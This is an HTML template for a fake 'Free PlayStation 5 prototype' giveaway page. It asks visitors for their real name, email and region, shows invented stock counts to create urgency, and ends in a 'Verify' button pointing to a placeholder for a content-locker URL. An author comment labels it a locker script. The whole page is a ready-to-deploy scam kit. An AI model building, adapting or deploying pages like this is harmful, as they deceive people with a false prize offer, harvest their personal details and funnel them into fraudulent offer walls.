
<!doctype html>
<html lang="en">
   <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
      <link rel="stylesheet" href="bootstrap.min.css">
      <link rel="stylesheet" href="main.css">
      <link rel="shortcut icon" href="favicon.ico">
      <title>Free PlayStation 5!</title>
   </head>
   <body>
      
    <div class="container">

        <div class="row justify-content-center align-items-center text-center">

            <div class="col-12 col-sm-10 col-md-10 col-lg-8 col-xl-8 text-center TEST">

                <div class="STEP-1 text-center">

                    <img src="logo.png" class="img-fluid w-75 mx-auto mb-2 LOGO">

                    <h2 class="TTU REG">Get <strong class="PSBLUE">PlayStation 5</strong> prototype for free!</h2>

                    <h6 class="text-center">We value our customers and because of that we are giving away some <strong>prototypes of PlayStation 5</strong> for free! <strong>You will be able to test our new system and the best games ever</strong>. Click button below to continue.</h6>

                    <button type="button" class="btn btn-primary btn-lg TTU w-75 mt-2 mx-auto" onclick="SS1();">Continue</button>

                </div>

                <div class="STEP-2 text-center">

                    <h3 class="TTU PSBLUE">Answer all questions</h3>

                    <h4>What is your name?</h4>

                    <input type="text" class="form-control form-control-lg mb-2" id="NAME" placeholder="Type in your real name">

                    <h4>What is your Email?</h4>

                    <input type="email" class="form-control form-control-lg mb-2" id="EMAIL" placeholder="Type in your Email address">

                    <h4>What is your region?</h4>

                    <select class="form-control form-control-lg" id="REGION">
                        <option value="" disabled selected hidden>Select your region</option>
                        <option value="Asia">Asia</option>
                        <option value="Africa">Africa</option>
                        <option value="North America">North America</option>
                        <option value="South America">South America</option>
                        <option value="Antarctica">Antarctica</option>
                        <option value="Europe">Europe</option>
                        <option value="Australia">Australia</option>
                      </select>

                      <button type="button" class="btn btn-primary btn-lg TTU w-75 mt-3 mx-auto" onclick="SS2();">Continue</button>

                </div>

                <div class="STEP-3 text-center">

                    <h4 class="TTU PSBLUE mb-0 TYPED"></h4>

                    <div class="LOADING-1 mx-auto">
                        <div class="LOADING-2"></div>
                    </div>

                    <div class="accordion mt-2" id="PSVERSIONS">

                        <div class="card">
                          <div class="card-header" id="H1">
                            <h2 class="mb-0">
                              <button class="btn btn-link collapsed" type="button" data-toggle="collapse" data-target="#NORMALPS5" aria-expanded="false" aria-controls="NORMALPS5">
                                <strong class="PSBLUE">PlayStation 5</strong> (<span class="AM1"></span> left)
                              </button>
                            </h2>
                          </div>
                      
                          <div id="NORMALPS5" class="collapse" aria-labelledby="H1" data-parent="#PSVERSIONS">
                            <div class="card-body">
                                <img src="NORMAL.png" class="img-fluid w-75 FLICK">
                              <p class="mt-1 mb-0">Slightly bigger version of <strong>PlayStation 5</strong> with optical disk drive.</p>
                            </div>
                          </div>
                        </div>

                        <div class="card">
                          <div class="card-header" id="H2">
                            <h2 class="mb-0">
                              <button class="btn btn-link collapsed" type="button" data-toggle="collapse" data-target="#DIGITALPS5" aria-expanded="false" aria-controls="DIGITALPS5">
                                <strong class="PSBLUE">PlayStation 5 Digital Edition</strong> (<span class="AM2"></span> left)
                              </button>
                            </h2>
                          </div>
                          <div id="DIGITALPS5" class="collapse" aria-labelledby="H2" data-parent="#PSVERSIONS">
                            <div class="card-body">
                                <img src="DIGITAL.png" class="img-fluid w-75 FLICK">
                              <p class="mt-1 mb-0">Smaller, digital version of <strong>PlayStation 5</strong> with super-fast 825 GB SSD.</p>
                            </div>
                          </div>
                        </div>

                      </div>

                      <button type="button" class="btn btn-primary btn-lg TTU w-100 mt-2 mx-auto SS3" onclick="SS3();">I choose</button>

                </div>

                <div class="STEP-4">

                    <h2 class="TTU PSBLUE mb-0">Your summary</h2>

                        <h4 class="REG mt-2 S_NAME"></h4>
                        <h4 class="REG S_EMAIL"></h4>
                        <h4 class="REG mb-2 S_REGION"></h4>

                    <h4 class="TTU PSBLUE mb-0 LAST"></h4>

                    <a id="verify-button" href="REPLACE YOUR CONTENT LOCKER URL HERE"> <button type="button" class="btn btn-primary btn-lg TTU w-75 mt-2 mx-auto SS4">Verify</button> </a>

                </div>

            </div>

        </div>

    </div>

      <script src="jquery-3.4.1.min.js"></script>
      <script src="popper.min.js"></script>
      <script src="bootstrap.min.js"></script>
      <script src="typed.min.js"></script>
      <script src="main.js"></script>

      <!-- LOCKER SCRIPT WITH LOAD METHOD: ONCLICK -->
      <!-- AUTHOR: FLICK :) SKYPE: flicks1337 -->

   </body>
</html>